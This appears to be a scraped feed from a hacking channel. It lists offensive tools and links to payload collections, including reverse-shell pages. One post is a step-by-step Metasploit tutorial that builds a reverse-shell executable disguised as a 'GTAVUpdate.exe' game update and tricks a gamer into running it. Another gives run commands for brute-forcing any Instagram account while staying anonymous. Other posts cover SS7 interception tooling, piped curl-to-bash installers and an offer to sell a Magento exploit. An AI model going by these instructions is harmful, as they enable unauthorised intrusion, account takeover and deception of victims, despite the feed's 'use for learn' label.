▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HELPFUL HACKING SPYWARES & TOOLS FOR ANY HACKER :

3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/

3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d

acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/

Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access.

Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/

findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com

sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r

ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com

ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html

admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html

adminpagefinder 0.1 This python script looks for a large amount of possible administrative interfaces on a given site.
http://packetstormsecurity.com/files/112855/Admin-Page-Finder-Script.html

admsnmp 0.1 ADM SNMP audit scanner.
aesfix 1.0.1 A tool to find AES key in RAM http://
citp.princeton.edu/memory/code/
aeskeyfind 1.0 A tool to find AES key in RAM http://citp.princeton.edu/memory/code/
aespipe 2.4c Reads data from stdin and outputs encrypted or decrypted results to stdout. http://loop-aes.sourceforge.net/aespipe/

afflib 3.7.3 An extensible open format for the storage of disk images and related forensic information. http://www.afflib.org

afpfs-ng 0.8.1 A client for the Apple Filing Protocol (AFP) http://alexthepuffin.googlepages.com/

against 0.2 A very fast ssh attacking script which includes a multithreaded port scanning module (tcp connect) for discovering possible targets and a multithreaded brute-forcing module which attacks parallel all discovered hosts or given ip addresses from a list. http://nullsecurity.net/tools/cracker.html

aiengine 339.58dfb85 A packet inspection engine with capabilities of learning without any human intervention. https://bitbucket.org/camp0/aiengine/
aimage 3.2.5 A program to create aff-images. http://www.afflib.org

air 2.0.0 A GUI front-end to dd/dc3dd designed for easily creating forensic images. http://air-imager.sourceforge.net/
airflood 0.1 A modification of aireplay that allows for a DOS in in the AP. This program fills the table of clients of the AP with random MACs doing impossible new connections. http://packetstormsecurity.com/files/51127/airflood.1.tar.gz.html

airgraph-ng 2371 Graphing tool for the aircrack suite http://www.aircrack-ng.org

airoscript 45.0a122ee A script to simplify the use of aircrack-ng tools. http://midnightresearch.com/projects/wicrawl/
airpwn 1.4 A tool for generic packet injection on an 802.11 network. http://airpwn.sourceforge.net

allthevhosts 1.0 A vhost discovery tool that scrapes various web applications http://labs.portcullis.co.uk/tools/finding-all-the-vhosts/


U S E F O R L E A R N !!
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST 2020 FREE & ANONYMOUS VPN WITH 4- 5 RATING :

https://play.google.com/store/apps/details?id=com.tunnelbear.android

https://play.google.com/store/apps/details?id=com.kaspersky.secure.connection

https://play.google.com/store/apps/details?id=hotspotshield.android.vpn

https://play.google.com/store/apps/details?id=com.avira.vpn

https://play.google.com/store/apps/details?id=com.speedify.speedifyandroid&hl=en

https://play.google.com/store/apps/details?id=com.windscribe.vpn

https://play.google.com/store/apps/details?id=ch.protonvpn.android

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE SS7 HACKING 2020 UPDATE :

SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7, GTP (3G), Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Version 1: SS7
SigPloit will initially start with SS7 vulnerabilities providing the messages used to test the below attacking scenarios

A- Location Tracking

B- Call and SMS Interception

C- Fraud
Version 2: GTP
This Version will focus on the data roaming attacks that occur on the IPX/GRX interconnects.

Version 3: Diameter
This Version will focus on the attacks occurring on the LTE roaming interconnects using Diameter as the signaling protocol.

Version 4: SIP
This is Version will be concerned with SIP as the signaling protocol used in the access layer for voice over LTE(VoLTE) and IMS infrastructure. Also, SIP will be used to encapsulate SS7 messages (ISUP) to be relayed over VoIP providers to SS7 networks taking advantage of SIP-T protocol, a protocol extension for SIP to provide intercompatability between VoIP and SS7 networks

Version 5: Reporting
This last Version will introduce the reporting feature. A comprehensive report with the tests done along with the recommendations provided for each vulnerability that has been exploited.

BETA Version of SigPloit will have the Location Tracking attacks of the SS7 phase 1
Installation and requirements
The requirements for this project are:

1) Python 2.7

2) Java version 1.7 +

3) sudo apt-get install lksctp-tools

4) Linux machine

To run use

5) cd SigPloit

6) sudo pip2 install -r requirements.txt

7) python sigploit.py

✅GIT 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

General Trafc Manipulation Intro Previously we used Wireshark to capture network trafc. Passive snifng is usually easy but only useful to a degree. If the application was using TLS, we would have seen garbage after the TLS handshake . In these cases, Man-in-the-Middling (MitM-ing) the trafc with a proxy tool (e.g. Burp) is usually the way to go. But that introduces new challenges.
1. Redirecting the trafc to the proxy.

2. Masquerading as the server (e.g. make client accept our proxy's certicate instead of server).

3. Modifying packets.
I will need a lot of pages to talk about these and document what I have learned through the years. This is not the place for it.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE CC & GIFT CARDS APPS 2020 :
-LIST 4

https://play.google.com/store/apps/details?id=com.shopkick.app

https://play.google.com/store/apps/details?id=com.receiptpalapp.android&hl=en_US

https://apps.apple.com/us/app/receipt-pal-earn-rewards/id732079889

https://play.google.com/store/apps/details?id=com.google.android.apps.paidtasks

https://play.google.com/store/apps/details?id=com.google.android.apps.paidtasks

https://www.microsoft.com/en-us/rewards

https://play.google.com/store/apps/details?id=com.google.android.apps.paidtasks

https://apps.apple.com/us/app/apptrailers/id469489347

https://play.google.com/store/apps/details?id=com.appredeem.apptrailers&hl=en_US

https://play.google.com/store/apps/details?id=com.appkarma.app

https://play.google.com/store/apps/details?id=com.appnana.android.giftcardrewards

https://play.google.com/store/apps/details?id=gift.wojingdaile

https://play.google.com/store/apps/details?id=com.appnana.android.giftcardrewards

https://play.google.com/store/apps/details?id=app.fortunebox

https://play.google.com/store/apps/details?id=gift.wallet.orion

U S E F O R L E A R N !!
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

SOME GOOD PENTESTING COURSE >

https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EpnjkaMNMRdJvQQNQOOEt60BMX2XzvhotZ1Uy3ZXPRsteQ?e=PdnUeY

Detailed fresh Proxies List


https://pastebin.com/D7tvx0YB

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VIRUS/MALWARES /PAYLOADS FREE CREATING TOOLS :

- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)

- [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)

- [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md)

- [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)

- [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md)

- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)

- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)

- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)

- [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md)

- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)

- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)

- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

- [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md)

- [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)

- [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)

- [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)

- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)

- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)

- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)

- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)


U S E F O R L E A R N !!
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What to do if Magisk shows passing SafetyNet test, but problems persist ?
#requested

1) Google recently launched a new SafetyNet test, which may cause problems with rooted Android devices. A safetyNet status check is performed using Google servers, which cannot be tricked by conventional means. If Magisk shows that you have passed the SafetyNet test, but you still have problems, this change may be to blame.

Most users run the SafetyNet test through Magisk Manager, but this is no longer recommended. This option only shows local status using old spoofing methods. It may seem like you passed the test, but you are not.

If you want to know what is happening in reality, you need to download a separate application to check the SafetyNet status. It's called SafetyNet Test and is available on the Play Store.

2) The process is very simple. When you have launched the application, you need to click on the "Test" button. In a few seconds, you will see if you passed the Google SafetyNet test or not. When Magisk shows you passed SafetyNet but SafetyNet Test fails, Google's innovation has affected your device.

3)(2) this means the SafetyNet status is checked remotely. (3) if the device passes the SafetyNet test, you should see a Pass message. This is a good sign that your device is not affected by the change.

If you see a “Failed” message, problems may arise in the future. You may lose access to certain apps like Google Pay and Pokémon GO. Google has been working on this for several years and now the result is closer than ever. However, you can still use your modified mods.

4) As more applications can start using the new SafetyNet check, it doesn't hurt to have a second device. This will allow you to work with one of them with root and with the other without. You can find good-quality, affordable Android smartphones and bypass the SafetyNet check.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑bypass GFW trojan 2020 :
An unidentifiable mechanism that helps you bypass GFW.

Trojan features multiple protocols over TLS to avoid both active/passive detections and ISP QoS limitations.

Trojan is not a fixed program or protocol. It's an idea, an idea that imitating the most common service, to an extent that it behaves identically, could help you get across the Great FireWall permanently, without being identified ever. We are the GreatER Fire; we ship Trojan Horses.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

A) sudo bash -c "$(curl -fsSL https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"
or

sudo bash -c "$(wget -O- https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"


B) AOSC OS
sudo apt-get install trojan

C) Arch Linux
sudo pacman -S trojan

D) AUR
$(AURHelper) -S trojan-git

E) Debian 10 :

1) sudo apt install trojan
<= 9
TROJAN_DEBIAN_VERSION="1.10.0-3"

2) sudo apt update

3) sudo apt install build-essential devscripts debhelper

4) cmake libboost-system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev python3 curl openssl

5) dget http://ftp.us.debian.org/debian/pool/main/t/trojan/trojan_${TROJAN_DEBIAN_VERSION}.dsc

6) dpkg-source -x trojan_${TROJAN_DEBIAN_VERSION}.dsc trojan-${TROJAN_DEBIAN_VERSION}

7) cd trojan-${TROJAN_DEBIAN_VERSION}/dpkg-buildpackage -us -uc -d

8) sudo dpkg -i ../trojan_${TROJAN_DEBIAN_VERSION}_$(dpkg-architecture -q DEB_BUILD_ARCH).deb

9) sudo apt purge devscripts debhelper cmake # you can remove it now

f)Ubuntu

1) sudo add-apt-repository ppa:greaterfire/trojan

2) sudo apt-get update

3) sudo apt-get install trojan


🦑how to byppass free full tutorial https://trojan-gfw.github.io/trojan/config

U S E F O R L E A R N !!
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack Windows 10 with Metasploit :

1) Create metasploit

2) Before creating the metasploit, we need to figure out what is our Kali Linux local IP.
For that, run

ip addr

or

ifconfig

3) Get the IPv4 Local IP

4) Now let’s get hands dirty!

5) In the terminal run the follow command:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 –
platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe

6) The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.

7) The name of the .exe is up to you. In this case I’ll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.

8) We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.


9) First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command

use multi/handler

. We will then set the payload to match the one set within the executable using the command

set payload windows/meterpreter/reverse_tcp

. We will then set the LHOST and LPORT this way —

set LHOST 192.168.195.72

and set

LPORT 4444

. Once done, type

run

or ```exploit```and press Enter.

10) The reverse TCP handler should begin waiting for a
You can use show options to check if everything’s ok

11) If everything’s ok type run or exploit

🦑Social Engineer ;

1) Now it’s the part that you need to do some social engineer in order to make the user execute the program.
For this tutorial we will simply host the .exe on apache2 and transfer it on the Windows Machine.

2) On the Windows machine you just need to access via the browser the IP/File.exe

3) In our case is 192.168.192.72/GTAVUpdate.exe

4) Now execute and check the connection on the Kali

now you can dump & do everything

U S E F O R L E A R N !!
sources- metasploit/undercode/medium
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK INSTAGRAM NEW UPDATE 2020- 3 MONTHS :

This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/Pure-L0G1C/Instagram.git

2) cd instagram

3) pip3 install -r requirements.txt

4) C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist

positional arguments:
username email or username
wordlist password list

optional arguments:
-h, --help show this help message and exit
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots

4) python3 instagram.py <username> <wordlist> -m <mode>

———————————————

5) Bots(Threads)

4 bots: 64 passwords at a time
8 bots: 128 passwords at a time
16 bots: 256 passwords at a time
32 bots: 512 passwords at a time

6) Modes
0: 32 bots
1: 16 bots
2: 8 bots
3: 4 bots

7) Chill mode
This mode uses only 4 bots, or 64 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3

8) Moderate mode 1
This mode uses 8 bots, or 128 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2

9) Moderate mode 2
This mode uses 16 bots, or 256 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1

10) Savage mode
This mode uses 32 bots, or 512 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0

11) If you don't specify a mode, then mode is set to 2

✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Magento exploit for $5000
#CyberAttacks
_